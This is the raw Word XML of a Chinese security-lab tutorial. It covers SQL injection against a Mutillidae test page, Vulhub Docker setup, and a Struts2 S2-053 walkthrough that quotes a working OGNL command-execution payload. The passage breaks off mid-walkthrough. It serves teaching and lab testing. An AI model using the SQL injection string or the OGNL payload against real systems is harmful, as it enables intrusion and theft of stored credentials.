        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://10.180.184.30/mutillidae/index.php?page=register.php注册1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个用户，test1，密码password，signature信息填写test1</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后重新在浏览器中打开</w:t>
      </w:r>
      <w:hyperlink r:id="rId140" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://10.180.184.30/mutillidae/index.php?page=user-info.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在name输入框中输入test1‘ or </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:t>‘1’=’1</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息，不用填密码，直接点击查看账户信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F139F54" wp14:editId="2ED44809">
            <wp:extent cx="5274310" cy="32962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96285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以直接查出test1的用户信息，包括密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20DC581D" wp14:editId="402D1804">
            <wp:extent cx="5274310" cy="34969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496945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00207330" w:rsidP="00207330">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="10" w:name="_Toc499884686"/>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vulhub</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Vulhub是一款使用Docker-compose进行漏洞测试/环境一键搭建的项目。</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>它是</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>面向大众的开源漏洞靶场，无需docker知识，简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ulhub项目是基于docker容器搭建的，可以根据需要自行编译每个漏洞项目，也可以直接去下载别人已经编译好的漏洞项目。下面介绍下介于docker自行编译漏洞项目。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00207330" w:rsidP="00207330">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.1.3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>环境安装</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>在ubuntu16.04下安装docker/docker-compose:</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安装pip</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url -s https://bootstrap.pypa.io/get-pip.py | python3</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安装最新版docker</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url -s https://get.docker.com/ | sh</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启动docker服务</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service docker start</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安装compose</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xml:space="preserve">pip install docker-compose </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>其他操作系统安装docker和docker-compose可能会有些许不同，请阅读Docker文档进行安装。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00207330" w:rsidP="00207330">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.3.2 </w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ulhub使用</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1）</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>拉取项目</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>到本地</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git clone git@github.com:phith0n/vulhub.git</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d vulhub</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2）</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> 进入某一个漏洞/环境的目录</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d nginx_php5_mysql</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3）</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> 自动化编译环境</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docker-compose build</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4）</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> 启动整个环境</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docker-compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>每个</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>环境目录下都有相应的说明文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>介绍这个漏洞的信息和利用的方法，可以参考该说明文件</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>进行漏洞/环境测试。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>5）</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>测试完成后，删除整个环境</w:t>
      </w:r>
    </w:p>
    <w:p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docker-compose down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00207330" w:rsidP="00D64CE4">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3.1.3.3</w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>举个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>我们来搭建bulhub项目中struct2</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>-053</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1）进入到漏洞的目录下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>root@ubuntu:/mnt/myspace#cd vulhub-master/struts2/s2-053/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>root@ubuntu:/mnt/myspace/vulhub-master/struts2/s2-053# ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>01.png  docker-compose.yml  README.md</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>2）可以看到目录下包含一个</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>README.</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>md文档，该文档介绍了改漏洞的环境编译，漏洞存在的原因和如何利用信息，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t># S2-053 远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>漏洞详情:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId143" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://struts.apache.org/docs/s2-053.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId144" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483663&amp;idx=1&amp;sn=6304e1469f23c33728ab5c73692b675e</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>## 测试环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:lastRenderedPageBreak/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>docker-compose up -d</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:br/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>环境运行后，访问`http://your-ip:8080/hello.action`即可看到一个提交页面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>## 漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>Struts2在使用Freemarker模板引擎的时候，同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析，但由于被Freemarker解析一次后变成离开一个表达式，被OGNL解析第二次，导致任意命令执行漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>输入如下Payload即可成功执行命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4"/>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3）参照该文档分别使用命令启动环境（有些漏洞项目需要编译，具体参照各漏洞的文档说明）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose up –d </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>命令启动环境</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>4）漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>在浏览器中输入如下地址：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>our</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ip：8080/</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>hello.</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>actio</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
